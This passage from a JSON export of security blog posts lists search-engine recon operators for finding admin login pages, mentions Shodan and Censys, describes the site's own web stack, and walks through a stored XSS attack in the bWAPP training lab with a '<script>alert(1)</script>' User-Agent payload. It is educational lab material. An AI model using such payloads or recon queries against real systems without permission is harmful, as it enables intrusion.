border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intitle</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search Page Title</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intitle:admin login</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintitle</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search Page Title</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid 
rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintitle:admin page</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inurl</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search URL</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inurl:8080/login</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allinurl</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px 
solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search URL</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allinurl:admin</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">filetype</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Specific Files</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">filetype: json</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 
1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intext</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search text of page only</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intext: \"admin credentials\"</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintext</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search text of page only</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 
0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintext: \"security tools\"</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">site</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search specific site</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">site:example.com</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">link</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 
221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search for links to pages</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">link:bing.com</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inanchor</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search link anchor text</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inanchor:\"guest user\"</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); 
border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">numrange</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Locate specific number</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">numrange:1-100</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">cache</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search for cached version of any website</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); 
padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">cache:www.example.com</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_all_border\" style=\"box-sizing: border-box; border: 1px solid rgb(209, 209, 209); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">related</font></span></td><td class=\"blog_table_no_left_with_bottom_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); border-bottom: 1px solid rgb(209, 209, 209); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search for similar types of website</font></span></td><td class=\"blog_table_no_left_with_bottom_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); border-bottom: 1px solid rgb(209, 209, 209); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" style=\"\" size=\"4\">related:www.example.com</font></span></td></tr></tbody></table><br></font></div><div><font style=\"\"><b><font size=\"5\">9. 
Shodan</font></b><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\"><div>Shodan is a search engine that hackers and security researchers use to find vulnerable Internet of Things devices. By querying the engine, they can get a device's IP address, web server details, banner, ISP, SSH, FTP, TELNET and many more.</div><div><br></div><div>For hackers, it's a great playground for gathering as much information as possible about a target.</div><div><br></div></font></font></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">product<span class=\"token operator\">:</span><span class=\"token maybe-class-name\">MongoDB</span></code></pre></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://www.shodan.io/\"><font color=\"#dd4124\"><b>https://www.shodan.io/</b></font></a></font><br></div><div><br></div><div><font size=\"5\"><b>10. Censys</b></font><br></div><div><br></div><div><font size=\"4\">Censys is a search engine that is pretty similar to Shodan. It allows hackers and security researchers to scan devices and hosts, and it gives an aggregate report on how the systems are configured (Certificates, Websites, etc.) and deployed. 
Censys is designed to find poorly configured devices on the internet, and because it maintains a large database, it's very useful for gathering information about a specific target.</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">www<span class=\"token punctuation\">.</span><span class=\"token property-access\">example</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://censys.io/\"><font color=\"#dd4124\"><b>https://censys.io/</b></font></a></font><br></div><div><br></div><div><span style=\"font-size: large;\">I hope you understand by now why RECON is important in Bug Bounty. I found these to be the top 10 Recon tools which you can use to gather as much information as possible about a specific target, but there are also many other tools which you can explore for information gathering. In my future tutorials I'll demonstrate those tools.</span><br></div><div><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": true,
            "featured_board": true,
            "featured": "<font face=\"Lora, serif\" size=\"4\">The article was highly appreciated by many&nbsp;<a href=\"https://en.wikipedia.org/wiki/Information_security\"><font color=\"#dd4124\">InfoSec</font></a> communities&nbsp;and featured in their platforms as top automation &amp; reconnaissance&nbsp;article for Bug Bounty.</font><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\"><b>Top Mentions</b></font></div><div><ul><li><font face=\"Lora, serif\" size=\"4\" color=\"#dd4124\"><a href=\"https://github.com/OWASP/Amass/blob/master/REFERENCES.md\"><font color=\"#dd4124\">OWASP Amass GitHub&nbsp;Project</font></a>&nbsp;</font><font face=\"Lora, serif\" size=\"4\">- by <a href=\"https://twitter.com/jeff_foley\"><font color=\"#dd4124\">@jeff_foley</font></a></font></li><li><font size=\"4\"><a href=\"https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/blogposts.md#automation--recon\"><font color=\"#dd4124\">Resources for Beginner Bug Bounty Hunters</font></a> -&nbsp;by <a href=\"https://twitter.com/NahamSec\"><font color=\"#dd4124\">@NahamSec</font></a></font><br></li><li><font size=\"4\"><a href=\"https://twitter.com/Alra3ees/status/1225903602717405185\"><font color=\"#dd4124\">10 Recon Tools For Bug Bounty</font></a> - by <a href=\"https://twitter.com/Alra3ees\"><font color=\"#dd4124\">@Alra3ees</font></a></font><br></li></ul><div><br></div></div>"
        },
        {
            "title": "HackbotOne - Full Stack Application",
            "blog_id": "hackbotone-full-stack-application",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-01-01T19:56:51.262315Z",
            "last_updated_date": "2021-06-07T21:18:20.856450Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/hackbotone-full-stack-application/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/hackbotone-full-stack-application/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/hackbotone-full-stack-application/large_thumbnail.png",
            "keywords": [
                "react.js",
                "node.js",
                "mongodb"
            ],
            "highlights": "HackbotOne website produce contents from various domains such as Web Hacking, Bug Bounty, Application Development & GameDevelopment.",
            "description": "<b><font size=\"5\">Introduction</font></b><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">HackbotOne website produce contents from various domains such as Web Hacking, Bug Bounty, Application Development &amp; Game Development</span><span style=\"font-size: large;\">.</span><br></div><div><span style=\"font-size: large;\"><br></span></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/jUiYl1Bqe7s\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">Which type of content you can expect?</font></b><br></div><div><b><br></b></div><div><b><font size=\"4\">Application Development</font></b><br></div><div><b><br></b></div><div><font size=\"4\">I will publish contents from both web &amp; mobile platforms for example - (Android, Node.js, MongoDB, Go, Reactjs, React-Native and many more) which are related to application development I’ll try to cover those topics with step-by-step explanation and mostly in this section I'll cover programming.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Game Development</b><br></font></div><div><b><br></b></div><div><font size=\"4\">Mostly you can expect contents from Unity3d game engine platform and I'll try to make small video tutorial series with step by step explanation of every component of the game and also if I'll know some new game engine platforms then definitely you can expect write-ups on this website.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Ethical Hacking</b><br></font></div><div><font size=\"4\"><b><br></b></font></div><div><font size=\"4\">In this section mostly you can expect contents from Bug Bounty write-ups, Security Lab Exercises, Penetration testing tools and also as per my research if I'll know about latest exploits then definitely you can expect write-ups 
with video tutorials on this website.<br></font></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">How is it built?</font></b><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><div>This is a full-stack web application. It runs React.js as the front end and Node.js as the backend, and it uses a MongoDB database for storage. To render the website smoothly, I use server-side rendering, a very popular technique in which the client-side web page is rendered on the server and the server sends the complete result to the client. The client JavaScript then takes control to render the page.</div><div><br></div><div>To bundle the modules I use Webpack, a JavaScript module bundler that bundles JavaScript and front-end assets like HTML, CSS and images and generates static assets.</div></font></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Open Source</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><div style=\"\"><font size=\"4\">It would be quite difficult for me to walk you through every line of code step by step. That's why I made the complete development open-source on my GitHub. 
This should be helpful for beginners and for those who have an interest in this area and want to know more about the development of this website.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\" color=\"#dd4124\"><b><a href=\"https://github.com/anshumanpattnaik/hackbotone-mern-website\"><font color=\"#dd4124\">https://github.com/anshumanpattnaik/hackbotone-mern-website</font></a></b></font><br></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">So this is the overall explanation of '<i>hackbotone.com</i>'. I&nbsp;hope you will like my work. If you find any issues, such as ways to improve the code, then please feel free to raise an issue on GitHub.&nbsp;</font><span style=\"font-size: large;\">That will help me make the site more robust.</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Cross-Site-Scripting - Stored (SQLiteManager & User-Agent)",
            "blog_id": "cross-site-scripting-stored-sqlitemanager-and-user-agent",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-30T19:56:42.608642Z",
            "last_updated_date": "2021-06-06T10:39:41.968408Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/large_thumbnail.png",
            "keywords": [
                "Stored XSS",
                "bWAPP",
                "Penetration Testing"
            ],
            "highlights": "This is the demonstration of Stored Cross-Site Scripting attack in SQLiteManager & User-Agent header and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.",
            "description": "<div><font size=\"4\">This is the demonstration of Stored Cross-Site Scripting attack in SQLiteManager &amp; User-Agent header and for this demo, I'll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">bWAPP Official Link:- <a href=\"http://www.itsecgames.com/\"><font color=\"#dd4124\">http://www.itsecgames.com/</font></a></font></div><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/34sk4qOuA6s\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">How to perform Stored Cross-Site-Scripting attack in SQLiteManager?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_1.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (SQLiteManager)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_2.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot it shows the message that \"<i>The SQLiteManager version is vulnerable to Cross-Site Scripting!</i>\". And in the hint, the CVE no is mentioned. 
- (CVE-2012-5105), so let's search for this number to get more information about this vulnerability.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_3.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">According to the CVE report, an XSS vulnerability was found in <b>SQLiteManager version 1.2.4</b> which allows remote attackers to inject arbitrary web script into the DB shell parameter in the main.php and index.php files.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">To get the complete report of this vulnerability please visit this link:- <a href=\"https://www.exploit-db.com/download/36510/\"><font color=\"#dd4124\"><b>36510</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">Exploit DB report</font></b><br></div><div><br></div><div><div><font size=\"4\">SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">SQLiteManager 1.2.4 is vulnerable; other versions may also be affected. But as per their report, I don't think this vulnerability exists as it is very old. 
So for every application, always use an updated version and follow its forums so that you can get in touch with its developer community and get the latest updates.</font></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">SQLiteManager Developer Communities</font></b><br></div><div><br></div><div><ul><li><font color=\"#dd4124\" size=\"4\"><b><a href=\"https://db4s.slack.com/\"><font color=\"#dd4124\">DB Browser for SQLite</font></a></b></font><br></li><li><font color=\"#dd4124\" size=\"4\"><font color=\"#dd4124\"><b><a href=\"https://twitter.com/sqlitebrowser\"><font color=\"#dd4124\">SQLiteBrowser Twitter</font></a></b></font><br></font></li><li><font color=\"#dd4124\" size=\"4\"><b><a href=\"https://github.com/sqlitebrowser/sqlitebrowser\"><font color=\"#dd4124\">SQLiteBrowser Github</font></a></b><br></font></li></ul></div><div><br></div><div><b><font size=\"5\">How to perform a Stored Cross-Site-Scripting attack in the User-Agent Header?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_4.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (User-Agent)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_5.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As you can see from the above screenshot, it's able to identify my browser version, operating system and some other details, and these details are stored in the database.</font><br></div><div><font size=\"4\"><br></font></div><div><img 
src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_6.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">So now let's intercept the request using <a href=\"https://portswigger.net/burp\"><font color=\"#dd4124\"><b>Burp Suite</b></font></a> so that you can inject a JavaScript payload into the User-Agent header.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_7.png\"><font size=\"4\"><br></font></div><div><font size=\"4\">Now go back again and choose the same option <b>Cross-site-Scripting - Stored (User-Agent)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_8.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">If you go back to Burp Suite and follow the same steps that we followed in the <a href=\"https://hackbotone.com/blog/cross-site-scripting-stored-sqlitemanager-and-user-agent#\"><font color=\"#dd4124\"><b>reflected module</b></font></a>, you will be able to see the intercepted request for the \"xss_stored_4.php\" file.</font><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_9.png\"><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">Now let's inject the payload into the \"</span><b style=\"font-size: large;\">User-Agent</b><span style=\"font-size: large;\">\" header.</span><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span 
class=\"token operator\">&lt;</span>script<span class=\"token operator\">&gt;</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre></div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_10.png\"><br></div><div><span style=\"font-size: large;\">Now if you go back to the browser, you will be able to see the alert dialog box.</span><br></div><div><span style=\"font-size: large;\"><br></span></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_11.png\"><span style=\"font-size: large;\"><br></span></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot, we are able to inject JavaScript code into the <b>\"User-Agent\"</b> header. 
